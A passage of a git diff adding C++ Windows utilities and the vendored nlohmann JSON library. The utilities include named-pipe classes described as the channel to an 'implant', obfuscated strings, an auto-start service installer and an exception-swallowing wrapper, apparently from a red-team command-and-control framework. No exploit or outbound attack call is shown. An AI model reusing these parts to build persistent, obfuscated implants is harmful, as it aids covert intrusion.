Let Read() know that the pipe is ready to be read. + SetEvent(m_Event.get()); + + return data.size(); +} diff --git a/Src/Common/MWR/WinTools/Pipe.h b/Src/Common/MWR/WinTools/Pipe.h new file mode 100644 index 0000000..31abcfc --- /dev/null +++ b/Src/Common/MWR/WinTools/Pipe.h @@ -0,0 +1,125 @@ +#pragma once + +#include "UniqueHandle.h" + +namespace MWR::WinTools +{ + /// Class that does not own any pipe, can be used to read and write data in alternating way. + class AlternatingPipe // TODO support for creating pipe. + { + public: + /// Public constructor. + /// + /// @param pipename. Name used for pipe registration. Pipe prefix is not required. + /// @throws std::runtime_error on any WinAPI errors occurring. + AlternatingPipe(ByteView pipename); + + /// Sends data to pipe. + /// @param data buffer to send. + /// @throws std::runtime_error on any WinAPI errors occurring during writing to the named pipe. + ByteVector Read(); + + /// Retrieves data from the pipe. + /// @throws std::runtime_error on any WinAPI errors occurring during reading from the named pipe. + size_t Write(ByteView data); + private: + /// Name of the Pipe used to communicate with the implant. + std::string m_PipeName; + + /// Communication Pipe handle. + UniqueHandle m_Pipe; + + /// Unnamed event used to synchronize reads/writes to the pipe. + UniqueHandle m_Event; + }; + + /// Class that owns one pipe and can write to it. + class WritePipe + { + public: + /// Public constructor. + /// + /// @param pipename. Name used for pipe registration. Pipe prefix is not required. + WritePipe(ByteView pipename); + + /// Connects pipe and writes whole message to pipe. + /// + /// @param data to be written. + /// @note function automatically adds 4 byte size prefix before actual data. + /// @throws std::runtime_error if data.size() cannot be stored in uint32_t. This condition is highly unlikly in normal use. + /// @throws std::runtime_error if conection was closed from other side during transmision. + size_t Write(ByteView data); + + private: + /// Name of pipe. + std::string m_PipeName; + + /// Unique handle to pipe. Handle will be closed by custom deleter. + std::unique_ptr> m_Pipe; + }; + + /// Class that does not own any pipe, can be used to read data. + class ReadPipe + { + public: + /// Public constructor. + /// + /// @param pipename. Name used for pipe registration. Pipe prefix is not required. + ReadPipe(ByteView pipename); + + /// Tries to connect to opened pipe and reed one packet of data. + /// + /// @note function automatically use 4 byte size prefix to consume whole packet. This prefix will not be present in returned string. + /// @throws std::runtime_error if conection was closed from other side during transmision. + ByteVector Read(); + + private: + /// Name of pipe. + std::string m_PipeName; + }; + + /// Class using two pipe for duplex transmission. + /// + /// Objects of PipeHelper should be used in pairs on both sides of communication. + /// Methods of this class does not introduce new threads. Use external thread objects to preform asynchronous communication. + class DuplexPipe + { + public: + /// Public constructor. + /// + /// @param inputPipeName. Name used for pipe registration. Pipe prefix is not required. + /// @param outputPipeName. Name used for pipe registration. Pipe prefix is not required. + DuplexPipe(ByteView inputPipeName, ByteView outputPipeName); + + /// Public constructor. + /// + /// @param pipeNames. Tuple with first two arguments convertible to ByteView. + template > 1), int> = 0> + DuplexPipe(T pipeNames) + : DuplexPipe(std::get<0>(pipeNames), std::get<1>(pipeNames)) + { + + } + + /// Tries to connect to opened pipe and reed one packet of data. + /// + /// @note function automatically use 4 byte size prefix to consume whole packet. This prefix will not be present in returned string. + /// @throws std::runtime_error if conection was closed from other side during transmision. + ByteVector Read(); + + /// Connects pipe and writes whole message to pipe. + /// + /// @param data to be written. + /// @note function automatically adds 4 byte size prefix before actual data. + /// @throws std::runtime_error if data.size() cannot be stored in uint32_t. This condition is highly unlikly in normal use. + /// @throws std::runtime_error if conection was closed from other side during transmision. + size_t Write(ByteView data); + + private: + /// Input pipe. + ReadPipe m_InputPipe; + + /// Output pipe. + WritePipe m_OutputPipe; + }; +} \ No newline at end of file diff --git a/Src/Common/MWR/WinTools/PrecompiledHeader.hpp b/Src/Common/MWR/WinTools/PrecompiledHeader.hpp new file mode 100644 index 0000000..60cf2b7 --- /dev/null +++ b/Src/Common/MWR/WinTools/PrecompiledHeader.hpp @@ -0,0 +1,11 @@ +#pragma once + +// Windows includes. +#ifndef NOMINMAX +# define NOMINMAX //< Exclude min and max macros from windows.h. +#endif +#define WIN32_LEAN_AND_MEAN //< Exclude rarely-used stuff from Windows headers. +#include +#include "Proxy.h" +#include "StructuredExceptionHandling.h" +#include "HostInfo.h" diff --git a/Src/Common/MWR/WinTools/Proxy.cpp b/Src/Common/MWR/WinTools/Proxy.cpp new file mode 100644 index 0000000..f7c40a5 --- /dev/null +++ b/Src/Common/MWR/WinTools/Proxy.cpp @@ -0,0 +1,12 @@ +#include "StdAfx.h" +#include "Proxy.h" + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +std::wstring MWR::WinTools::GetProxyConfiguration() +{ + wchar_t* pValue = nullptr; + size_t len = 0; + auto err = _wdupenv_s(&pValue, &len, OBF_W(L"http_proxy")); + std::unique_ptr holder(pValue, [](wchar_t* p) { free(p); }); + return (!err && pValue && len) ? std::wstring{ pValue, len - 1 } : std::wstring{}; +} diff --git a/Src/Common/MWR/WinTools/Proxy.h b/Src/Common/MWR/WinTools/Proxy.h new file mode 100644 index 0000000..16f39db --- /dev/null +++ b/Src/Common/MWR/WinTools/Proxy.h @@ -0,0 +1,7 @@ +#pragma once + +namespace MWR::WinTools +{ + /// Retrieve proxy configuration from environment. + std::wstring GetProxyConfiguration(); +} \ No newline at end of file diff --git a/Src/Common/MWR/WinTools/Services.cpp b/Src/Common/MWR/WinTools/Services.cpp new file mode 100644 index 0000000..721dc1d --- /dev/null +++ b/Src/Common/MWR/WinTools/Services.cpp @@ -0,0 +1,200 @@ +#include "StdAfx.h" +#include "Services.h" + +// Statics. +SERVICE_STATUS_HANDLE MWR::CppCommons::WinTools::Services::s_ServiceStatusHandle; +SERVICE_STATUS MWR::CppCommons::WinTools::Services::s_ServiceStatus; +MWR::CppCommons::WinTools::AbstractService* MWR::CppCommons::WinTools::Services::s_Service; + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +std::pair MWR::CppCommons::WinTools::Services::IsServiceInstalled(std::wstring const& serviceName) +{ + // Open the Service Control Manager with full access. + SC_HANDLE manager = ::OpenSCManager(nullptr, nullptr, SC_MANAGER_ALL_ACCESS); + if (!manager) + return std::make_pair(ReturnEnum::OpeningServiceManager, XERROR_GETLASTERROR); + + // Try to open the service + if (SC_HANDLE service = ::OpenService(manager, serviceName.c_str(), SERVICE_QUERY_CONFIG)) + return std::make_pair(ReturnEnum::ClosingHandles, (::CloseServiceHandle(service) && ::CloseServiceHandle(manager) ? S_OK : XERROR_GETLASTERROR)); + + // Failed to open the Service. Make sure to return the right error. + auto retVal = XERROR_GETLASTERROR; + ::CloseServiceHandle(manager); + return std::make_pair(ReturnEnum::OpenService, retVal); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +std::pair MWR::CppCommons::WinTools::Services::InstallServiceSimple(std::filesystem::path const& binaryPath, std::wstring const& serviceName) +{ + // Open the Service Control Manager with full access + SC_HANDLE manager = ::OpenSCManager(nullptr, nullptr, SC_MANAGER_ALL_ACCESS); + if (!manager) + return std::make_pair(ReturnEnum::OpeningServiceManager, XERROR_GETLASTERROR); + + // Create the service + if (SC_HANDLE service = ::CreateServiceW(manager, serviceName.c_str(), serviceName.c_str(), SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, + binaryPath.c_str(), nullptr, nullptr, nullptr, nullptr, nullptr)) + return std::make_pair(ReturnEnum::ClosingHandles, (::CloseServiceHandle(service) && ::CloseServiceHandle(manager) ? S_OK : XERROR_GETLASTERROR)); + + // Failed to open the Service. Make sure to return right error. + auto retVal = XERROR_GETLASTERROR; + ::CloseServiceHandle(manager); + return std::make_pair(ReturnEnum::CreateService, retVal); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +std::pair MWR::CppCommons::WinTools::Services::UninstallService(std::wstring const& serviceName) +{ + // Open the Service Control Manager with full access + SC_HANDLE manager = ::OpenSCManager(nullptr, nullptr, SC_MANAGER_ALL_ACCESS); + if (!manager) + return std::make_pair(ReturnEnum::OpeningServiceManager, XERROR_GETLASTERROR); + + // Try to open the service + if (SC_HANDLE service = ::OpenService(manager, serviceName.c_str(), STANDARD_RIGHTS_REQUIRED)) + { + if (::DeleteService(service)) + return std::make_pair(ReturnEnum::ClosingHandles, (::CloseServiceHandle(service) && ::CloseServiceHandle(manager) ? S_OK : XERROR_GETLASTERROR)); + + // Failed to open the Service. Make sure to return right error. + auto retVal = XERROR_GETLASTERROR; + ::CloseServiceHandle(service); + ::CloseServiceHandle(manager); + return std::make_pair(ReturnEnum::DeleteService, retVal); + } + + // Failed to open the Service. Make sure to return right error. + auto retVal = XERROR_GETLASTERROR; + ::CloseServiceHandle(manager); + return std::make_pair(ReturnEnum::OpenService, retVal); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::CppCommons::CppTools::XError MWR::CppCommons::WinTools::Services::TryStartAsService(AbstractService& theOnlyService, std::wstring const& serviceName) +{ + // Sanity check. + if (s_Service) + return HRESULT_FROM_WIN32(ERROR_FILE_EXISTS); + + // Copy Service object and start the Service. + s_Service = &theOnlyService; + SERVICE_TABLE_ENTRY table[] = { { const_cast(serviceName.c_str()), ServiceMain }, { nullptr, nullptr } }; + return ::StartServiceCtrlDispatcher(table) ? S_OK : XERROR_GETLASTERROR; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +std::pair MWR::CppCommons::WinTools::Services::CheckStatus(std::wstring const& serviceName) +{ + // Open the Service Control Manager with full access + SC_HANDLE manager = ::OpenSCManager(nullptr, nullptr, SC_MANAGER_ENUMERATE_SERVICE); + if (!manager) + return std::make_pair(Status::Unknown, XERROR_GETLASTERROR); + + // Try to open the service + if (SC_HANDLE service = ::OpenService(manager, serviceName.c_str(), SERVICE_QUERY_STATUS)) + { + if (!service) + { + CloseServiceHandle(manager); + return std::make_pair(Status::Unknown, XERROR_GETLASTERROR); + } + + SERVICE_STATUS_PROCESS ssStatus; + DWORD dwBytesNeeded; + auto result = QueryServiceStatusEx(service, SC_STATUS_PROCESS_INFO, reinterpret_cast(&ssStatus), sizeof(SERVICE_STATUS_PROCESS), &dwBytesNeeded); + + auto retVal = XERROR_GETLASTERROR; + ::CloseServiceHandle(service); + ::CloseServiceHandle(manager); + return std::make_pair(result ? static_cast(ssStatus.dwCurrentState) : static_cast(0), retVal); + } + + + // Failed to open the Service. Make sure to return right error. + auto retVal = XERROR_GETLASTERROR; + ::CloseServiceHandle(manager); + return std::make_pair(Status::Unknown, retVal); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::CppCommons::WinTools::Services::ServiceMain(DWORD argc, LPTSTR* argv) +{ + // Register the control request handler + if (s_ServiceStatusHandle = RegisterServiceCtrlHandler(OBF_W(TEXT("AdsaServicePoX")), ControlHandler), !s_ServiceStatusHandle) + { + //SvcReportEvent(TEXT("RegisterServiceCtrlHandler")); Windows event viewer + return; + } + + // Immediately call the SetServiceStatus function, to notify the Service Control Manager that its status is SERVICE_START_PENDING. + s_ServiceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS; + s_ServiceStatus.dwServiceSpecificExitCode = 0; + if (SetServiceStatus(SERVICE_START_PENDING, 1000).IsFailure()) + { + //SvcReportEvent(TEXT("RegisterServiceCtrlHandler")); Windows event viewer + return; + } + + // Perform the actual initialization + auto xe = s_Service->OnServiceInit(argc, argv); + if (xe.IsSuccess()) + { + // Set final state. + auto xe2 = SetServiceStatus(SERVICE_RUNNING); + if (xe2.IsFailure()) + { + //SvcReportEvent(TEXT("RegisterServiceCtrlHandler")); Windows event viewer + SetServiceStatus(SERVICE_STOPPED, 0, **xe); + return; + } + + // Do the real work. When the OnServiceRun function returns, the service stops. + xe = s_Service->OnServiceRun(); + } + + // Stop the Service. + SetServiceStatus(SERVICE_STOPPED, 0, **xe); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::CppCommons::WinTools::Services::ControlHandler(DWORD opcode) +{ + // Handle particular code. + switch (opcode) + { + case SERVICE_CONTROL_STOP: SetServiceStatus(SERVICE_STOP_PENDING, 100, NO_ERROR); SetServiceStatus(SERVICE_STOPPED, 0, **s_Service->OnServiceStop()); break; + case SERVICE_CONTROL_PAUSE: s_Service->OnServicePause(); break; + case SERVICE_CONTROL_CONTINUE: s_Service->OnServiceContinue(); break; + case SERVICE_CONTROL_INTERROGATE: s_Service->OnServiceInterrogate(); break; + case SERVICE_CONTROL_SHUTDOWN: s_Service->OnServiceShutdown(); break; + default: if (opcode >= 128) s_Service->OnServiceUserControl(opcode); + } +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::CppCommons::CppTools::XError MWR::CppCommons::WinTools::Services::SetServiceStatus(DWORD state, DWORD waitHint, DWORD serviveExitCode) +{ + // WinAPI needs a valid, self incremented counter to be passed with each call, so let's make it static. + static DWORD checkPoint = 1; + + // Fill in the SERVICE_STATUS structure. + s_ServiceStatus.dwCurrentState = state; + s_ServiceStatus.dwWaitHint = waitHint; + + // The error code the service uses to report an error that occurs when it is starting or stopping. + if (serviveExitCode) + { + s_ServiceStatus.dwWin32ExitCode = ERROR_SERVICE_SPECIFIC_ERROR; + s_ServiceStatus.dwServiceSpecificExitCode = serviveExitCode; + } + + // The service should not accept any controls, when it's in start pending state. After initialization, it is wise to allow the Service to be stopped. + s_ServiceStatus.dwControlsAccepted = (state == SERVICE_START_PENDING ? 0 : SERVICE_ACCEPT_STOP); + + // Check point should be reset on stop and run events. + s_ServiceStatus.dwCheckPoint = (state == SERVICE_RUNNING || state == SERVICE_STOPPED ? 0 : checkPoint++); + + // Report the status of the service to the SCM. + return ::SetServiceStatus(s_ServiceStatusHandle, &s_ServiceStatus) ? NO_ERROR : GetLastError(); +} diff --git a/Src/Common/MWR/WinTools/Services.h b/Src/Common/MWR/WinTools/Services.h new file mode 100644 index 0000000..8585883 --- /dev/null +++ b/Src/Common/MWR/WinTools/Services.h @@ -0,0 +1,92 @@ +#pragma once + +#include "AbstractService.h" + +namespace MWR::CppCommons::WinTools +{ + /// Microsoft Windows Services functionality wrapper structure. This is a static structure. + struct Services + { + /// Enumeration type that is used to describe precisely on which phase of particular function call error has occurred. + enum class ReturnEnum + { + OpeningServiceManager, ///< Error happened on call to ::OpenSCManager. + OpenService, ///< Error happened on call to ::OpenService. Might happen when calling IsServiceInstalled or UninstallService. + CreateService, ///< Error happened on call to ::CreateService. Might happen when calling InstallServiceSimple. + DeleteService, ///< Error happened on call to ::DeleteService. Might happen when calling UninstallService. + ClosingHandles, ///< Error happened on call to ::CloseServiceHandle. + }; + + /// Enumeration type that is used to describe service status. + enum class Status + { + Unknown = 0, + Stopped, + StartPending, + StopPending, + Running, + ContinuePending, + PausePending, + Paused + }; + + /// Checks if a Service is installed in the system. + /// @param serviceName name of the Service to check. + /// @reutrn std::pair of ReturnEnum and HRESULT. If ReturnEnum equals ClosingHandles, it means that the check was successful (the Service exists), but HRESULT part might contain an error that + /// occurred when cleaning-up. If the Service is not installed then the HRESULT part equals WinTools::SystemErrorToHresult(ERROR_SERVICE_DOES_NOT_EXIST). + /// @note std::pair is return instead of XError, because there's no clear distinction between a success and a failure here (e.g. error on phase ClosingHandles). + static std::pair IsServiceInstalled(std::wstring const& serviceName); + + /// Performs simplified installation of a Service that runs in its own process and has the same name and display name. + /// @param binaryPath path to a binary containing the Service. + /// @param serviceName name of the Service. + /// @reutrn std::pair of ReturnEnum and HRESULT. If ReturnEnum equals ClosingHandles, it means that the installation was successful, but HRESULT part might contain an error that occurred when + /// cleaning-up. If the Service is already installed then the HRESULT part equals WinTools::SystemErrorToHresult(ERROR_SERVICE_EXISTS). + /// @note std::pair is return instead of XError, because there's no clear distinction between a success and a failure here (e.g. error on phase ClosingHandles). + static std::pair InstallServiceSimple(std::filesystem::path const& binaryPath, std::wstring const& serviceName); + + /// Uninstalls Service from system. + /// @param serviceName name of the Service. + /// @reutrn std::pair of ReturnEnum and HRESULT. If ReturnEnum equals ClosingHandles, it means that the uninstallation was successful, but HRESULT part might contain an error that occurred when + /// cleaning-up. If the Service is not installed then the HRESULT part equals WinTools::SystemErrorToHresult(ERROR_SERVICE_DOES_NOT_EXIST). + /// @note std::pair is return instead of XError, because there's no clear distinction between a success and a failure here (e.g. error on phase ClosingHandles). + static std::pair UninstallService(std::wstring const& serviceName); + + /// If run as a Service, gives control to Service Control Manager (never returns). Otherwise (if run as a "normal" user-land application) returns with HRESULT code. + /// @param theOnlyService service object singleton. + /// @param serviceName name of the Service. + /// @return HRESULT code if not run as a Microsoft Windows Service. + static CppTools::XError TryStartAsService(AbstractService& theOnlyService, std::wstring const& serviceName); + + /// Retrieves the service status of the specified service. + /// @param serviceName name of the Service. + /// @reutrn std::pair of Status and HRESULT. If Status is equal to Unknown, it means that the HRESULT part might contain an error that occurred. + /// @note std::pair is return instead of XError + static std::pair CheckStatus(std::wstring const& serviceName); + + protected: + /// Friendships. + friend void AbstractService::SetServiceStatus(DWORD state, DWORD waitHint, DWORD serviveExitCode); ///< AbstractService::SetStatus internally redirects here. + + /// Sets status of run Service. + /// @param state new state to set. + /// @param waitHint the estimated time required for a pending start, stop, pause, or continue operation, in milliseconds. + /// @param serviveExitCode a service-specific error code that the service returns when an error occurs while the service is starting or stopping. + static CppTools::XError SetServiceStatus(DWORD state, DWORD waitHint = 0, DWORD serviveExitCode = NO_ERROR); + + private: + /// Entry point of the Service. Used as a callback by API. + /// @param argc number of Service command-line arguments that are passed in argv array. + /// @param argv array of Service command-line arguments. + static void WINAPI ServiceMain(DWORD argc, LPTSTR* lpszArgv); + + /// Members + static AbstractService *s_Service; ///< The only Service object. + static SERVICE_STATUS_HANDLE s_ServiceStatusHandle; ///< Handle to Service. + static SERVICE_STATUS s_ServiceStatus; ///< Service Status structure. + + /// Handles commands from the Service Control Manager. Used as a callback by API. + /// @param opcode control code. + static void WINAPI ControlHandler(DWORD opcode); + }; +} diff --git a/Src/Common/MWR/WinTools/StructuredExceptionHandling.cpp b/Src/Common/MWR/WinTools/StructuredExceptionHandling.cpp new file mode 100644 index 0000000..8f85d76 --- /dev/null +++ b/Src/Common/MWR/WinTools/StructuredExceptionHandling.cpp @@ -0,0 +1,33 @@ +#include "StdAfx.h" +#include "StructuredExceptionHandling.h" + +int MWR::WinTools::StructuredExceptionHandling::Filter(unsigned int code, struct _EXCEPTION_POINTERS* ep) +{ + return EXCEPTION_EXECUTE_HANDLER; +} + +DWORD WINAPI MWR::WinTools::StructuredExceptionHandling::SehWrapper(CodePointer func) +{ + __try + { + func(); + } + __except (Filter(GetExceptionCode(), GetExceptionInformation())) + { + // Nothing + } + + return 0; +} + +void MWR::WinTools::StructuredExceptionHandling::SehWrapper(std::function const& func, std::function const& closure) +{ + __try + { + func(); + } + __except (Filter(GetExceptionCode(), GetExceptionInformation())) + { + closure(); + } +} diff --git a/Src/Common/MWR/WinTools/StructuredExceptionHandling.h b/Src/Common/MWR/WinTools/StructuredExceptionHandling.h new file mode 100644 index 0000000..a3c5ffd --- /dev/null +++ b/Src/Common/MWR/WinTools/StructuredExceptionHandling.h @@ -0,0 +1,26 @@ +#pragma once + +namespace MWR::WinTools::StructuredExceptionHandling +{ + /// Code pointer alias + using CodePointer = void(*)(); + + /// Dummy filter. + /// @returns EXCEPTION_EXECUTE_HANDLER. + int Filter(unsigned int code, struct _EXCEPTION_POINTERS* ep); + + /// Wrap call to function in empty SEH handler. + /// @param pointer to code. + /// @returns 0. + DWORD WINAPI SehWrapper(CodePointer func); + + /// Wrap call in SEH handler + /// @param func - function to call + /// @param closure - handler called when func throws SE + void SehWrapper(std::function const& func, std::function const& closure); +} + +namespace MWR::WinTools +{ + namespace SEH = StructuredExceptionHandling; +} \ No newline at end of file diff --git a/Src/Common/MWR/WinTools/UniqueHandle.h b/Src/Common/MWR/WinTools/UniqueHandle.h new file mode 100644 index 0000000..580f914 --- /dev/null +++ b/Src/Common/MWR/WinTools/UniqueHandle.h @@ -0,0 +1,18 @@ +#pragma once + +namespace MWR::WinTools +{ + /// Custom std::unique_ptr deleter for WinAPI HANDLEs. + struct HandleDeleter + { + void operator()(void* handle) + { + if (!handle) + return; + + CloseHandle(handle); + handle = nullptr; + } + }; + typedef std::unique_ptr UniqueHandle; ///< Useful typedef for WinAPI HANDLE std::unique_ptr. +} diff --git a/Src/Common/json/LICENSE.MIT b/Src/Common/json/LICENSE.MIT new file mode 100644 index 0000000..4931d66 --- /dev/null +++ b/Src/Common/json/LICENSE.MIT @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2013-2019 Niels Lohmann + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. \ No newline at end of file diff --git a/Src/Common/json/json.hpp b/Src/Common/json/json.hpp new file mode 100644 index 0000000..da2f25a --- /dev/null +++ b/Src/Common/json/json.hpp @@ -0,0 +1,20890 @@ +/* + __ _____ _____ _____ + __| | __| | | | JSON for Modern C++ +| | |__ | | | | | | version 3.6.1 +|_____|_____|_____|_|___| https://github.com/nlohmann/json + +Licensed under the MIT License . +SPDX-License-Identifier: MIT +Copyright (c) 2013-2019 Niels Lohmann . + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. +*/ + +#ifndef INCLUDE_NLOHMANN_JSON_HPP_ +#define INCLUDE_NLOHMANN_JSON_HPP_ + +#define NLOHMANN_JSON_VERSION_MAJOR 3 +#define NLOHMANN_JSON_VERSION_MINOR 6 +#define NLOHMANN_JSON_VERSION_PATCH 1 + +#include // all_of, find, for_each +#include // assert +#include // and, not, or +#include // nullptr_t, ptrdiff_t, size_t +#include // hash, less +#include // initializer_list +#include // istream, ostream +#include // random_access_iterator_tag +#include // unique_ptr +#include // accumulate +#include // string, stoi, to_string +#include // declval, forward, move, pair, swap +#include // vector + +// #include + + +#include + +// #include + + +#include // transform +#include // array +#include // and, not +#include // forward_list +#include // inserter, front_inserter, end +#include // map +#include // string +#include // tuple, make_tuple +#include // is_arithmetic, is_same, is_enum, underlying_type, is_convertible +#include // unordered_map +#include // pair, declval +#include // valarray + +// #include + + +#include // exception +#include // runtime_error +#include // to_string + +// #include + + +#include // size_t + +namespace nlohmann +{ + namespace detail + { + /// struct to capture the start position of the current token + struct position_t + { + /// the total number of characters read + std::size_t chars_read_total = 0; + /// the number of characters read in the current line + std::size_t chars_read_current_line = 0; + /// the number of lines read + std::size_t lines_read = 0; + + /// conversion to size_t to preserve SAX interface + constexpr operator size_t() const + { + return chars_read_total; + } + }; + + } // namespace detail +} // namespace nlohmann + + +namespace nlohmann +{ + namespace detail + { + //////////////// + // exceptions // + //////////////// + + /*! + @brief general exception of the @ref basic_json class + + This class is an extension of `std::exception` objects with a member @a id for + exception ids. It is used as the base class for all exceptions thrown by the + @ref basic_json class. This class can hence be used as "wildcard" to catch + exceptions. + + Subclasses: + - @ref parse_error for exceptions indicating a parse error + - @ref invalid_iterator for exceptions indicating errors with iterators + - @ref type_error for exceptions indicating executing a member function with + a wrong type + - @ref out_of_range for exceptions indicating access out of the defined range + - @ref other_error for exceptions indicating other library errors + + @internal + @note To have nothrow-copy-constructible exceptions, we internally use + `std::runtime_error` which can cope with arbitrary-length error messages. + Intermediate strings are built with static functions and then passed to + the actual constructor. + @endinternal + + @liveexample{The following code shows how arbitrary library exceptions can be + caught.,exception} + + @since version 3.0.0 + */ + class exception : public std::exception + { + public: + /// returns the explanatory string + const char* what() const noexcept override + { + return m.what(); + } + + /// the id of the exception + const int id; + + protected: + exception(int id_, const char* what_arg) : id(id_), m(what_arg) {} + + static std::string name(const std::string& ename, int id_) + { + return "[json.exception." + ename + "." + std::to_string(id_) + "] "; + } + + private: + /// an exception object as storage for error messages + std::runtime_error m; + }; + + /*! + @brief exception indicating a parse error + + This exception is thrown by the library when a parse error occurs. Parse errors + can occur during the deserialization of JSON text, CBOR, MessagePack, as well + as when using JSON Patch. + + Member @a byte holds the byte index of the last read character in the input + file. + + Exceptions have ids 1xx. + + name / id | example message | description + ------------------------------ | --------------- | ------------------------- + json.exception.parse_error.101 | parse error at 2: unexpected end of input; expected string literal | This error indicates a syntax error while deserializing a JSON text. The error message describes that an unexpected token (character) was encountered, and the member @a byte indicates the error position. + json.exception.parse_error.102 | parse error at 14: missing or wrong low surrogate | JSON uses the `\uxxxx` format to describe Unicode characters. Code points above above 0xFFFF are split into two `\uxxxx` entries ("surrogate pairs"). This error indicates that the surrogate pair is incomplete or contains an invalid code point. + json.exception.parse_error.103 | parse error: code points above 0x10FFFF are invalid | Unicode supports code points up to 0x10FFFF. Code points above 0x10FFFF are invalid. + json.exception.parse_error.104 | parse error: JSON patch must be an array of objects | [RFC 6902](https://tools.ietf.org/html/rfc6902) requires a JSON Patch document to be a JSON document that represents an array of objects. + json.exception.parse_error.105 | parse error: operation must have string member 'op' | An operation of a JSON Patch document must contain exactly one "op" member, whose value indicates the operation to perform. Its value must be one of "add", "remove", "replace", "move", "copy", or "test"; other values are errors. + json.exception.parse_error.106 | parse error: array index '01' must not begin with '0' | An array index in a JSON Pointer ([RFC 6901](https://tools.ietf.org/html/rfc6901)) may be `0` or any number without a leading `0`. + json.exception.parse_error.107 | parse error: JSON pointer must be empty or begin with '/' - was: 'foo' | A JSON Pointer must be a Unicode string containing a sequence of zero or more reference tokens, each prefixed by a `/` character. + json.exception.parse_error.108 | parse error: escape character '~' must be followed with '0' or '1' | In a JSON Pointer, only `~0` and `~1` are valid escape sequences. + json.exception.parse_error.109 | parse error: array index 'one' is not a number | A JSON Pointer array index must be a number. + json.exception.parse_error.110 | parse error at 1: cannot read 2 bytes from vector | When parsing CBOR or MessagePack, the byte vector ends before the complete value has been read. + json.exception.parse_error.112 | parse error at 1: error reading CBOR; last byte: 0xF8 | Not all types of CBOR or MessagePack are supported. This exception occurs if an unsupported byte was read. + json.exception.parse_error.113 | parse error at 2: expected a CBOR string; last byte: 0x98 | While parsing a map key, a value that is not a string has been read. + json.exception.parse_error.114 | parse error: Unsupported BSON record type 0x0F | The parsing of the corresponding BSON record type is not implemented (yet). + + @note For an input with n bytes, 1 is the index of the first character and n+1 + is the index of the terminating null byte or the end of file. This also + holds true when reading a byte vector (CBOR or MessagePack). + + @liveexample{The following code shows how a `parse_error` exception can be + caught.,parse_error} + + @sa - @ref exception for the base class of the library exceptions + @sa - @ref invalid_iterator for exceptions indicating errors with iterators + @sa - @ref type_error for exceptions indicating executing a member function with + a wrong type + @sa - @ref out_of_range for exceptions indicating access out of the defined range + @sa - @ref other_error for exceptions indicating other library errors + + @since version 3.0.0 + */ + class parse_error : public exception + { + public: + /*! + @brief create a parse error exception + @param[in] id_ the id of the exception + @param[in] pos the position where the error occurred (or with + chars_read_total=0 if the position cannot be + determined) + @param[in] what_arg the explanatory string + @return parse_error object + */ + static parse_error create(int id_, const position_t& pos, const std::string& what_arg) + { + std::string w = exception::name("parse_error", id_) + "parse error" + + position_string(pos) + ": " + what_arg; + return parse_error(id_, pos.chars_read_total, w.c_str()); + } + + static parse_error create(int id_, std::size_t byte_, const std::string& what_arg) + { + std::string w = exception::name("parse_error", id_) + "parse error" + + (byte_ != 0 ? (" at byte " + std::to_string(byte_)) : "") + + ": " + what_arg; + return parse_error(id_, byte_, w.c_str()); + } + + /*! + @brief byte index of the parse error + + The byte index of the last read character in the input file. + + @note For an input with n bytes, 1 is the index of the first character and + n+1 is the index of the terminating null byte or the end of file. + This also holds true when reading a byte vector (CBOR or MessagePack). + */ + const std::size_t byte; + + private: + parse_error(int id_, std::size_t byte_, const char* what_arg) + : exception(id_, what_arg), byte(byte_) {} + + static std::string position_string(const position_t& pos) + { + return " at line " + std::to_string(pos.lines_read + 1) + + ", column " + std::to_string(pos.chars_read_current_line); + } + }; + + /*! + @brief exception 